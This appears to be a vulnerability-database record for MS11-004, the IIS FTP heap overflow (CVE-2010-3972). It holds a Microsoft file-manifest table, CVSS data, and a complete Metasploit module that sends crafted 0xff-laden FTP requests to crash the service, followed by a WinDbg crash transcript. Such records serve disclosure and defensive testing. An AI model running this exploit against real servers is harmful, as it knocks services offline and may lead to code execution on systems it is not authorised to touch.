(UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_rtm_bf~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,445</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_rtm~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,464</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_sp1_bf~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,445</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_sp1~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,464</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,914</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.16748_none_b0e2fab1e38f7c91.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">11,616</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:30</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.20888_none_b14157ccfccd8c1f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">11,616</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:14</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.17550_none_b2b6857be0c539b6.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">11,616</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.21649_none_b353f4ccf9d2a19e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">11,616</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:14</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div></div></body></html>", "edition": 2, "cvss3": {}, "published": "2020-04-16T08:19:30", "type": "mskb", "title": "MS11-004: Vulnerability in Internet Information Services (IIS) FTP service could allow remote code execution", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3972"], "modified": "2020-04-16T08:19:30", "id": "KB2489256", "href": "https://support.microsoft.com/en-us/help/2489256/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-12T21:56:41", "description": "This module triggers a heap overflow when processing a specially crafted FTP request containing Telnet IAC (0xff) bytes. When constructing the response, the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes. This issue can be triggered pre-auth and may in fact be exploitable for remote code execution.\n", "edition": 2, "cvss3": {}, "published": "2010-12-31T18:32:55", "type": "metasploit", "title": "Microsoft IIS FTP Server Encoded Response Overflow Trigger", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3972"], "modified": "2019-11-29T12:15:17", "id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS75_FTPD_IAC_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server Encoded Response Overflow Trigger',\n 'Description' => %q{\n This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.\n },\n 'Author' =>\n [\n 'Matthew Bergin', # Original discovery/disclosure\n 'jduck' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-3972' ],\n [ 'OSVDB', '70167' ],\n [ 'BID', '45542' ],\n [ 'MSB', 'MS11-004' ],\n [ 'EDB', '15803' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ]\n ],\n 'DisclosureDate' => 'Dec 21 2010'))\n\n register_options(\n [\n Opt::RPORT(21)\n ])\n end\n\n\n def run\n connect\n\n banner = sock.get_once(-1, 10)\n print_status(\"banner: #{banner.to_s.strip}\")\n\n buf = Rex::Text.pattern_create(1024)\n\n # the 0xff's must be doubled, the server will un-and-re-double them.\n ffs = \"\\xff\" * (0x7e*2)\n\n # Continuing after the first exception sometimes leads to this being derefenced.\n buf[0,3] = [0xdeadbe00].pack('V')[1,3]\n\n buf[4,ffs.length] = ffs\n buf << \"\\r\\n\"\n\n sock.put(buf)\n\n disconnect\n rescue ::Rex::ConnectionError\n end\nend\n\n=begin\n\nThis transcript is from a vulnerable Win7 machine:\n\nProcessing initial command '$<script.wdbg'\n0:012> $<script.wdbg\n0:012> bp ftpsvc+3f360 \".printf \\\"buf @ 0x%x, len: 0x%x (end: 0x%x)\\\\n\\\", eax, ecx, (eax+ecx);g\"\n0:012> bp ftpsvc+3f382 \".printf \\\"extra len: 0x%x\\\\n\\\", edi;g\"\n0:012> bp ftpsvc+3f395 \".printf \\\"(0x%x+0x%x) 0x%x > (0x%x-0x%x) 0x%x ??\\\\n\\\", ecx, edi, ebx, poi(esi+14), poi(esi+8), edx;g\"\n0:012> bp ftpsvc+3f397\n0:012> bp ftpsvc+3f39f \"r @$t0 = ecx;g\"\n0:012> bp ftpsvc+3f3a4 \".printf \\\"allocated 0x%x bytes at 0x%x (end: 0x%x)\\\\n\\\", @$t0, eax, (eax+@$t0);g\"\n0:012> *bp ftpsvc+3f3c0 \".printf \\\"writing 0xff to 0x%x\\\\n\\\", eax;g\"\n0:012> *bp ftpsvc+3f3c6 \".printf \\\"writing 0x%x to 0x%x\\\\n\\\", (edx & 0xff), eax;g\"\n0:012> g\nbuf @ 0x97f81c, len: 0x1b (end: 0x97f837)\nextra len: 0x0\nbuf @ 0x3e4ca0, len: 0x3a4 (end: 0x3e5044)\nextra len: 0x7e\n(0x3a4+0x7e) 0x422 > (0x422-0x0) 0x422 ??\nBreakpoint 3 hit\neax=003e4ca0 ebx=00000422 ecx=000003a4 edx=00000422 esi=00dcfaf8 edi=0000007e\neip=6c63f397 esp=00dcfaac ebp=00dcfac0 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\nftpsvc!TELNET_STREAM_CONTEXT::OnSendData+0x49:\n6c63f397 8b7df8 mov edi,dword ptr [ebp-8] ss:0023:00dcfab8=00000000\n0:007> g\n(2f8.a40): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=003e50d0 ebx=00000000 ecx=ffffffff edx=003e4898 esi=003e4890 edi=002f0000\neip=778f30d7 esp=00dcf990 ebp=00dcfa70 iopl=0 nv up ei ng nz ac pe cy\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297\nntdll!RtlpFreeHeap+0x4d6:\n778f30d7 8b19 mov ebx,dword ptr [ecx] ds:0023:ffffffff=????????\n0:007> g\n(2f8.a40): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=003e4898 ebx=003e4c98 ecx=deadbe27 edx=ffffff41 esi=003e4890 edi=002f0000\neip=778f6030 esp=00dcf950 ebp=00dcf978 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\nntdll!RtlpCoalesceFreeBlocks+0x268:\n778f6030 8b4904 mov ecx,dword ptr [ecx+4] ds:0023:deadbe2b=????????\n\n=end\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}